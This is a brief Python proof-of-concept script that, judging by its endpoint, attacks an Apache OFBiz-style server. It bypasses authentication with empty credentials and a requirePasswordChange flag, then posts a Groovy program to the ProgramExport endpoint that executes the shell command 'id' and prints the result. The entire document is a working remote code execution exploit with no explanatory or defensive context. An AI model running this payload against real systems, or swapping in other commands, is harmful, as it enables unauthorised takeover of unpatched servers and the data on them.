import requests

url = "https://192.168.1.67:8443/webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y"

headers = {
    "Accept-Encoding": "gzip, deflate, br",
    "Accept": "*/*",
    "Accept-Language": "en-US;q=0.9,en;q=0.8",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36",
    "Connection": "close",
    "Cache-Control": "max-age=0",
    "Content-Type": "application/x-www-form-urlencoded",
}

data = "groovyProgram=throw+new+Exception('id'.execute().text);"

response = requests.post(url, headers=headers, data=data, verify=False)

print(response.text)
